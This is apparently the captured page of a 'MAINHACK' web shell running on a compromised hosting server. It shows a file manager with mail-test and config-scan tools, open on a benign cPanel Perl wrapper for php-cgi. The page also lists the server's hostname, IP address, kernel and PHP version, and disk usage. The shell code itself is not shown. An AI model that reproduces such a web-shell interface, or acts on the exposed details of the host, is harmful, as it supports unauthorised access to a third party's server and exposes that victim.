[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: php
File is not writable. Editing disabled.
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - php-cgi Copyright 2018 cPanel, L.L.C. # All rights Reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited package ea_php_cli::cgi; BEGIN { delete @ENV{qw(PERL5LIB PERLLIB PERL5OPT PERL5DB PERL5SHELL PERL_DEBUG_MSTATS PERL_DESTRUCT_LEVEL)}; # Paranoid much? unshift @INC, '/var/cpanel/ea4'; # avoid slow use lib } use strict; use warnings; use ea_php_cli (); my $bin = "php-cgi"; run(@ARGV) unless caller(); sub run { return ea_php_cli::run( $bin, @_ ); # faster than unshift @_, "php-cgi"; goto &ea_php_cli::run; ? } 1;
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: lon-nr-cp1.bigcloudy.com
Server IP: 69.161.196.4
PHP Version: 8.2.31
Server Software: Apache
System: Linux lon-nr-cp1.bigcloudy.com 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
HDD Total: 149.25 GB
HDD Free: 37.88 GB
Domains on IP: N/A (Requires external lookup)
System Features